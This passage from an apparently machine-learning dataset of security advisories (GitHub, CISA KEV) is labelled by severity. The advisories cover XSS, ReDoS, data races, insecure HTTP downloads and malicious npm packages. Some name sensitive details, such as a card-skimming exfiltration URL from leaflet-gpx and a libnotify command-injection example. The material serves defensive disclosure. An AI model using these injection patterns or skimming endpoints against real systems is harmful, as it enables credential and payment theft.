autocomplete list renders user input as HTML without encoding.\n\n\n## Recommendation\n\nUpgrade to version 0.7.2 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "8e9dffd6700b25070a6f", "text": "Downloads Resources over HTTP in kindlegen\n\nAffected versions of `kindlegen` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `kindlegen`.\n\n## Recommendation\n\nUpdate to version 1.1.0 or greater.", "text_raw": "Downloads Resources over HTTP in kindlegen\n\n[Severity: HIGH]\n\nAffected versions of `kindlegen` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `kindlegen`.\n\n\n## Recommendation\n\nUpdate to version 1.1.0 or greater.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "ff082da1731205cfb5bc", "text": "Cross-Site Scripting in morris.js\n\nAffected versions of `morris.js` are vulnerable to cross-site scripting attacks in labels that appear when hovering over a particular point on a generated graph. The text content of these labels is not escaped, so if control over the labels is obtained, script can be injected. The script will run on the client side whenever that specific graph is loaded.\n\n## Recommendation\n\nA patch for this vulnerability was created in 2014, but has still not been published to npm. In order to mitigate this issue effectively, install the library from github via:\n```\nnpm i morrisjs/morris.js -s\n```", "text_raw": "Cross-Site Scripting in morris.js\n\n[Severity: MEDIUM]\n\nAffected versions of `morris.js` are vulnerable to cross-site scripting attacks in labels that appear when hovering over a particular point on a generated graph. The text content of these labels is not escaped, so if control over the labels is obtained, script can be injected. The script will run on the client side whenever that specific graph is loaded.\n\n\n## Recommendation\n\nA patch for this vulnerability was created in 2014, but has still not been published to npm. In order to mitigate this issue effectively, install the library from github via:\n```\nnpm i morrisjs/morris.js -s\n```", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-11-09", "split": "train"} -{"id": "e2d18c4a7310e93c3cc1", "text": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Exchange Server Remote Code Execution Vulnerability\n\nAffected: Microsoft Exchange Server\n\nMicrosoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-918\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "c8bf1db3fc0f41ea9a9b", "text": "Clarify `mediaType` handling\n\n### Impact\nIn the OCI Image Specification version 1.0.1 and prior, manifest and index documents are not self-describing and documents with a single digest could be interpreted as either a manifest or an index.\n\n### Patches\nThe Image Specification will be updated to recommend that both manifest and index documents contain a `mediaType` field to identify the type of document.\nRelease [v1.0.2](https://github.com/opencontainers/image-spec/releases/tag/v1.0.2) includes these updates.\n\n### Workarounds\nSoftware attempting to deserialize an ambiguous document may reject the document if it contains both “manifests” and “layers” fields or “manifests” and “config” fields.\n\n### References\nhttps://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/opencontainers/image-spec\n* Email us at [security@opencontainers.org](mailto:security@opencontainers.org)\n* https://github.com/opencontainers/image-spec/commits/v1.0.2", "text_raw": "Clarify `mediaType` handling\n\n[Severity: LOW]\n\n### Impact\nIn the OCI Image Specification version 1.0.1 and prior, manifest and index documents are not self-describing and documents with a single digest could be interpreted as either a manifest or an index.\n\n### Patches\nThe Image Specification will be updated to recommend that both manifest and index documents contain a `mediaType` field to identify the type of document.\nRelease [v1.0.2](https://github.com/opencontainers/image-spec/releases/tag/v1.0.2) includes these updates.\n\n### Workarounds\nSoftware attempting to deserialize an ambiguous document may reject the document if it contains both “manifests” and “layers” fields or “manifests” and “config” fields.\n\n### References\nhttps://github.com/opencontainers/distribution-spec/security/advisories/GHSA-mc8v-mgrf-8f4m\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/opencontainers/image-spec\n* Email us at [security@opencontainers.org](mailto:security@opencontainers.org)\n* https://github.com/opencontainers/image-spec/commits/v1.0.2\n", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-11-18", "split": "train"} -{"id": "2aa3adb0edf7f3bb4a92", "text": "vBulletin PHP Module Remote Code Execution Vulnerability\n\nAffected: vBulletin vBulletin\n\nThe PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "vBulletin PHP Module Remote Code Execution Vulnerability\n\nAffected: vBulletin vBulletin\n\nThe PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-74\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "fe85e94631b90427e64f", "text": "Regular Expression Denial of Service in negotiator\n\nAffected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.\n\n## Recommendation\n\nUpdate to version 0.6.1 or later.", "text_raw": "Regular Expression Denial of Service in negotiator\n\n[Severity: HIGH]\n\nAffected versions of `negotiator` are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted `Accept-Language` header value.\n\n\n\n\n## Recommendation\n\nUpdate to version 0.6.1 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-09", "split": "train"} -{"id": "44ee08192d3166b10343", "text": "Data race in conqueue\n\nAffected versions of this crate unconditionally implemented `Send`/`Sync` for `QueueSender`, allowing to send non-Send `T` to other threads by invoking `(&QueueSender).send()`.\n\nThis fails to prevent users from creating data races by sending types like `Rc` or `Arc>` to other threads, which can lead to memory corruption. The flaw was corrected in commit `1e462c3` by imposing `T: Send` to both `Send`/`Sync` impls for `QueueSender`/`QueueReceiver`.", "text_raw": "Data race in conqueue\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implemented `Send`/`Sync` for `QueueSender`, allowing to send non-Send `T` to other threads by invoking `(&QueueSender).send()`.\n\nThis fails to prevent users from creating data races by sending types like `Rc` or `Arc>` to other threads, which can lead to memory corruption. The flaw was corrected in commit `1e462c3` by imposing `T: Send` to both `Send`/`Sync` impls for `QueueSender`/`QueueReceiver`.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "e306cb29588e58dabea8", "text": "Potential Command Injection in libnotify\n\nVersions 1.0.3 and earlier of libnotify are affected by a shell command injection vulnerability. This may result in execution of arbitrary shell commands, if user input is passed into libnotify.notify.\n\nUntrusted input passed in the call to libnotify.notify could result in execution of shell commands. Callers may be unaware of this.\n\n### Example\n```js\nvar libnotify = require('libnotify')\nlibnotify.notify('UNTRUSTED INPUT', { title: \\\"\\\" }, function () {\n console.log(arguments);\n})\n```\n\nSpecial thanks to Neal Poole for submitting the pull request to fix this issue.\n\n## Recommendation\n\nUpdate to version 1.0.4 or greater", "text_raw": "Potential Command Injection in libnotify\n\n[Severity: CRITICAL]\n\nVersions 1.0.3 and earlier of libnotify are affected by a shell command injection vulnerability. This may result in execution of arbitrary shell commands, if user input is passed into libnotify.notify.\n\nUntrusted input passed in the call to libnotify.notify could result in execution of shell commands. Callers may be unaware of this.\n\n### Example\n```js\nvar libnotify = require('libnotify')\nlibnotify.notify('UNTRUSTED INPUT', { title: \\\"\\\" }, function () {\n console.log(arguments);\n})\n```\n\nSpecial thanks to Neal Poole for submitting the pull request to fix this issue.\n\n\n## Recommendation\n\nUpdate to version 1.0.4 or greater", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-08-31", "split": "train"} -{"id": "b911d6ada3a1563406f0", "text": "mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input\n\nAffected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.\n\n## Recommendation\n\nUpdate to version 2.0.3 or later.", "text_raw": "mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input\n\n[Severity: HIGH]\n\nAffected versions of `mime` are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.\n\n\n## Recommendation\n\nUpdate to version 2.0.3 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-20", "split": "train"} -{"id": "a6f0eeea9271784a5661", "text": "Downloads Resources over HTTP in bionode-sra\n\nAffected versions of `bionode-sra` insecurely downloads resources over HTTP.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. The author of this package has suggested using [urllib-sync](https://www.npmjs.com/package/urllib-sync).\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "Downloads Resources over HTTP in bionode-sra\n\n[Severity: HIGH]\n\nAffected versions of `bionode-sra` insecurely downloads resources over HTTP. \n\nIn scenarios where an attacker has a privileged network position, they can modify or read such resources at will. While the exact severity of impact for a vulnerability like this is highly variable and depends on the behavior of the package itself, it ranges from being able to read sensitive information all the way up to and including remote code execution.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. The author of this package has suggested using [urllib-sync](https://www.npmjs.com/package/urllib-sync).\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-02-18", "split": "train"} -{"id": "91889e7ebd6fe1c71698", "text": "Improper Input Validation in SocksJS-Node\n\nIncorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.", "text_raw": "Improper Input Validation in SocksJS-Node\n\n[Severity: MEDIUM]\n\nIncorrect handling of Upgrade header with the value websocket leads in crashing of containers hosting sockjs apps. This affects the package sockjs before 0.3.20.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "60317b468020a19c7cdc", "text": "Microsoft Office Outlook Security Feature Bypass Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office Outlook contains a security feature bypass vulnerability due to improperly handling objects in memory. Successful exploitation allows an attacker to execute commands.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Office Outlook Security Feature Bypass Vulnerability\n\nAffected: Microsoft Office\n\nMicrosoft Office Outlook contains a security feature bypass vulnerability due to improperly handling objects in memory. Successful exploitation allows an attacker to execute commands.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-119\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "4c1e41eb6db5fbc113ca", "text": "Malicious Package in retcodelog\n\nAll versions of `retcodelog` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in retcodelog\n\n[Severity: CRITICAL]\n\nAll versions of `retcodelog` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "0a3619fd30146fdbebf9", "text": "Incorrect Session Validation in Apache Airflow\n\nIncorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.", "text_raw": "Incorrect Session Validation in Apache Airflow\n\n[Severity: HIGH]\n\nIncorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A. This does not affect users who have changed the default value for `[webserver] secret_key` config.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-04-20", "split": "train"} -{"id": "3796a58dce3c1b9b903e", "text": "Malicious Package in antd-cloud\n\nAll versions of `antd-cloud` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in antd-cloud\n\n[Severity: CRITICAL]\n\nAll versions of `antd-cloud` contain malicious code. The package uploads system information to a remote server, downloads a file and executes it.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "5505cfdf2789dd9f2f39", "text": "Downloads Resources over HTTP in apk-parser3\n\nAffected versions of `apk-parser3` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser3`.\n\n## Recommendation\n\nUpdate to version 0.1.3 or greater.", "text_raw": "Downloads Resources over HTTP in apk-parser3\n\n[Severity: HIGH]\n\nAffected versions of `apk-parser3` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `apk-parser3`.\n\n\n## Recommendation\n\nUpdate to version 0.1.3 or greater.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "bd88fc5a3fd10b207e0a", "text": "Denial of Service in ecstatic\n\n`ecstatic`, a simple static file server middleware, is vulnerable to denial of service. If a payload with a large number of null bytes (`%00`) is provided by an attacker it can crash ecstatic by running it out of memory.\n\n[Results from the original advisory](https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/)\n\n```\nA payload of 22kB caused a lag of 1 second,\nA payload of 35kB caused a lag of 3 seconds,\nA payload of 86kB caused the server to crash\n```\n\n## Recommendation\n\nUpdate to version 2.0.0 or later.", "text_raw": "Denial of Service in ecstatic\n\n[Severity: HIGH]\n\n`ecstatic`, a simple static file server middleware, is vulnerable to denial of service. If a payload with a large number of null bytes (`%00`) is provided by an attacker it can crash ecstatic by running it out of memory.\n\n\n[Results from the original advisory](https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/)\n\n```\nA payload of 22kB caused a lag of 1 second,\nA payload of 35kB caused a lag of 3 seconds,\nA payload of 86kB caused the server to crash\n```\n\n\n## Recommendation\n\nUpdate to version 2.0.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2017-12-28", "split": "train"} -{"id": "43d35ed139019eafd4b8", "text": "Access and integrity issue within Eclipse Jetty\n\nIn Eclipse Jetty versions 9.4.0 through 9.4.8, when using the optional Jetty provided FileSessionDataStore for persistent storage of HttpSession details, it is possible for a malicious user to access/hijack other HttpSessions and even delete unmatched HttpSessions present in the FileSystem's storage for the FileSessionDataStore.", "text_raw": "Access and integrity issue within Eclipse Jetty\n\n[Severity: HIGH]\n\nIn Eclipse Jetty versions 9.4.0 through 9.4.8, when using the optional Jetty provided FileSessionDataStore for persistent storage of HttpSession details, it is possible for a malicious user to access/hijack other HttpSessions and even delete unmatched HttpSessions present in the FileSystem's storage for the FileSessionDataStore.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-16", "split": "train"} -{"id": "9d3d0c5ff45fd769a5ff", "text": "Apache HTTP Server Privilege Escalation Vulnerability\n\nAffected: Apache HTTP Server\n\nApache HTTP Server, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute code with the privileges of the parent process (usually root) by manipulating the scoreboard.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apache HTTP Server Privilege Escalation Vulnerability\n\nAffected: Apache HTTP Server\n\nApache HTTP Server, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute code with the privileges of the parent process (usually root) by manipulating the scoreboard.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "4e928d1bc85092fc3ee2", "text": "Cross-Site Scripting in react-dom\n\nAffected versions of `react-dom` are vulnerable to Cross-Site Scripting (XSS). The package fails to validate attribute names in HTML tags which may lead to Cross-Site Scripting in specific scenarios. This may allow attackers to execute arbitrary JavaScript in the victim's browser. To be affected by this vulnerability, the application needs to:\n- be a server-side React app\n- be rendered to HTML using `ReactDOMServer`\n- include an attribute name from user input in an HTML tag\n\n## Recommendation\n\nIf you are using `react-dom` 16.0.x, upgrade to 16.0.1 or later. \nIf you are using `react-dom` 16.1.x, upgrade to 16.1.2 or later. \nIf you are using `react-dom` 16.2.x, upgrade to 16.2.1 or later. \nIf you are using `react-dom` 16.3.x, upgrade to 16.3.3 or later. \nIf you are using `react-dom` 16.4.x, upgrade to 16.4.2 or later.", "text_raw": "Cross-Site Scripting in react-dom\n\n[Severity: MEDIUM]\n\nAffected versions of `react-dom` are vulnerable to Cross-Site Scripting (XSS). The package fails to validate attribute names in HTML tags which may lead to Cross-Site Scripting in specific scenarios. This may allow attackers to execute arbitrary JavaScript in the victim's browser. To be affected by this vulnerability, the application needs to:\n- be a server-side React app\n- be rendered to HTML using `ReactDOMServer`\n- include an attribute name from user input in an HTML tag\n\n\n## Recommendation\n\nIf you are using `react-dom` 16.0.x, upgrade to 16.0.1 or later. \nIf you are using `react-dom` 16.1.x, upgrade to 16.1.2 or later. \nIf you are using `react-dom` 16.2.x, upgrade to 16.2.1 or later. \nIf you are using `react-dom` 16.3.x, upgrade to 16.3.3 or later. \nIf you are using `react-dom` 16.4.x, upgrade to 16.4.2 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-01-04", "split": "train"} -{"id": "79b734ebd40129e06867", "text": "Denial of Service in protobufjs\n\nVersions of `protobufjs` before 5.0.3 and 6.8.6 are vulnerable to a regular expression denial of service when parsing crafted invalid *.proto files.\n\n## Recommendation\n\nUpdate to version 5.0.3, 6.8.6 or later.", "text_raw": "Denial of Service in protobufjs\n\n[Severity: MEDIUM]\n\nVersions of `protobufjs` before 5.0.3 and 6.8.6 are vulnerable to a regular expression denial of service when parsing crafted invalid *.proto files.\n\n\n## Recommendation\n\nUpdate to version 5.0.3, 6.8.6 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-10-09", "split": "train"} -{"id": "6d79850ad2caba7dd2fd", "text": "Data races in multiqueue\n\nAffected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv). This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.", "text_raw": "Data races in multiqueue\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implemented Send for types used in queue implementations (InnerSend, InnerRecv, FutInnerSend, FutInnerRecv). This allows users to send non-Send types to other threads, which can lead to data race bugs or other undefined behavior.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "7a5ba4c887c689fb3274", "text": "Cross-Site Request Forgery in kimai2\n\nCSRF in saving invoices / modifying status of invoices (pending and cancel only)", "text_raw": "Cross-Site Request Forgery in kimai2\n\n[Severity: MEDIUM]\n\nCSRF in saving invoices / modifying status of invoices (pending and cancel only)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-10", "split": "train"} -{"id": "3f5ccfd31510b7adf94e", "text": "Data race in syncpool\n\nAffected versions of this crate unconditionally implements Send for Bucket2. This allows sending non-Send types to other threads. This can lead to data races when non Send types like Cell or Rc are contained inside Bucket2 and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). The flaw was corrected in commit `15b2828` by adding a T: Send bound to the Send impl of Bucket2.", "text_raw": "Data race in syncpool\n\n[Severity: HIGH]\n\nAffected versions of this crate unconditionally implements Send for Bucket2. This allows sending non-Send types to other threads. This can lead to data races when non Send types like Cell or Rc are contained inside Bucket2 and sent across thread boundaries. The data races can potentially lead to memory corruption (as demonstrated in the PoC from the original report issue). The flaw was corrected in commit `15b2828` by adding a T: Send bound to the Send impl of Bucket2.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "ebe71f2efec8f942996f", "text": "Denial of service in geth\n\n### Impact\nDenial-of-service (crash) during block processing\n\n### Details\n\nAffected versions suffer from a vulnerability which can be exploited through the `MULMOD` operation, by specifying a modulo of `0`: `mulmod(a,b,0)`, causing a `panic` in the underlying library. \nThe crash was in the `uint256` library, where a buffer [underflowed](https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L442).\n\nif `d == 0`, `dLen` remains `0`\n\nand https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L451 will try to access index `[-1]`.\n\nThe `uint256` library was first merged in this [commit](https://github.com/ethereum/go-ethereum/commit/cf6674539c589f80031f3371a71c6a80addbe454), on 2020-06-08. \nExploiting this vulnerabilty would cause all vulnerable nodes to drop off the network.\n\nThe issue was brought to our attention through a [bug report](https://github.com/ethereum/go-ethereum/issues/21367), showing a `panic` occurring on sync from genesis on the Ropsten network.\n\nIt was estimated that the least obvious way to fix this would be to merge the fix into `uint256`, make a new release of that library and then update the geth-dependency.\n\n- https://github.com/holiman/uint256/releases/tag/v1.1.1 was made the same day, \n- PR to address the issue: https://github.com/holiman/uint256/pull/80 \n- PR to update geth deps: https://github.com/ethereum/go-ethereum/pull/21368\n\n### Patches\n\nUpgrade to v1.9.18 or higher\n\n### Workarounds\n\nNot at this time\n\n### References\n\nhttps://blog.ethereum.org/2020/11/12/geth_security_release/\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum)\n* Email us at [security@ethereum.org](mailto:security@ethereum.org)", "text_raw": "Denial of service in geth\n\n[Severity: MEDIUM]\n\n### Impact\nDenial-of-service (crash) during block processing\n\n### Details\n\nAffected versions suffer from a vulnerability which can be exploited through the `MULMOD` operation, by specifying a modulo of `0`: `mulmod(a,b,0)`, causing a `panic` in the underlying library. \nThe crash was in the `uint256` library, where a buffer [underflowed](https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L442).\n\n\tif `d == 0`, `dLen` remains `0`\n\nand https://github.com/holiman/uint256/blob/4ce82e695c10ddad57215bdbeafb68b8c5df2c30/uint256.go#L451 will try to access index `[-1]`.\n\nThe `uint256` library was first merged in this [commit](https://github.com/ethereum/go-ethereum/commit/cf6674539c589f80031f3371a71c6a80addbe454), on 2020-06-08. \nExploiting this vulnerabilty would cause all vulnerable nodes to drop off the network. \n\nThe issue was brought to our attention through a [bug report](https://github.com/ethereum/go-ethereum/issues/21367), showing a `panic` occurring on sync from genesis on the Ropsten network.\n \nIt was estimated that the least obvious way to fix this would be to merge the fix into `uint256`, make a new release of that library and then update the geth-dependency.\n\n- https://github.com/holiman/uint256/releases/tag/v1.1.1 was made the same day, \n- PR to address the issue: https://github.com/holiman/uint256/pull/80 \n- PR to update geth deps: https://github.com/ethereum/go-ethereum/pull/21368 \n\n\n\n### Patches\n\nUpgrade to v1.9.18 or higher\n\n### Workarounds\n\nNot at this time\n\n### References\n\nhttps://blog.ethereum.org/2020/11/12/geth_security_release/\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum)\n* Email us at [security@ethereum.org](mailto:security@ethereum.org)\n", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-29", "split": "train"} -{"id": "994639bacace07b224b2", "text": "Malicious Package in bitcion-ops\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "Malicious Package in bitcion-ops\n\n[Severity: CRITICAL]\n\nAll versions of this package contained malware. The package was designed to find and exfiltrate cryptocurrency wallets.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-04", "split": "train"} -{"id": "5e728377b48fce995190", "text": "SilverStripe GraphQL Server permission checker not inherited by query subclass.\n\nDefault SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1 permission checker not inherited by query subclass.", "text_raw": "SilverStripe GraphQL Server permission checker not inherited by query subclass.\n\n[Severity: MEDIUM]\n\nDefault SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1 permission checker not inherited by query subclass.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "5d1f4a72680277272675", "text": "Epic Games Fortnite 4.2-CL-4072250 Insecure File Permissions", "text_raw": "Epic Games Fortnite 4.2-CL-4072250 Insecure File Permissions\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-05-21", "split": "train"} -{"id": "5410d06dc07d8c5995a8", "text": "Malicious Package in leaflet-gpx\n\nVersion 1.0.1 of `leaflet-gpx` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider a downgrade to version 1.0.0", "text_raw": "Malicious Package in leaflet-gpx\n\n[Severity: CRITICAL]\n\nVersion 1.0.1 of `leaflet-gpx` contained malicious code. The code when executed in the browser would enumerate password, cvc and cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`\n\n\n\n## Recommendation\n\nRemove the package from your environment and evaluate your application to determine whether or not user data was compromised.\n\nUsers may consider a downgrade to version 1.0.0", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "352bb7b4aa1d79992a9b", "text": "Information Exposure vulnerability in Eclipse Jetty\n\nIn Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory contents. This information reveal is restricted to only the content in the configured base resource directories.", "text_raw": "Information Exposure vulnerability in Eclipse Jetty\n\n[Severity: MEDIUM]\n\nIn Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote client when it is configured for showing a Listing of directory contents. This information reveal is restricted to only the content in the configured base resource directories.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-04-23", "split": "train"} -{"id": "b49c38f463d0134e6b8b", "text": "Injection and Command Injection in devcert\n\nA command injection vulnerability in the `devcert` module may lead to remote code execution when users of the module pass untrusted input to the `certificateFor` function.", "text_raw": "Injection and Command Injection in devcert\n\n[Severity: HIGH]\n\nA command injection vulnerability in the `devcert` module may lead to remote code execution when users of the module pass untrusted input to the `certificateFor` function.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "60bb12b1952278868d6d", "text": "Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability", "text_raw": "Kemana Directory 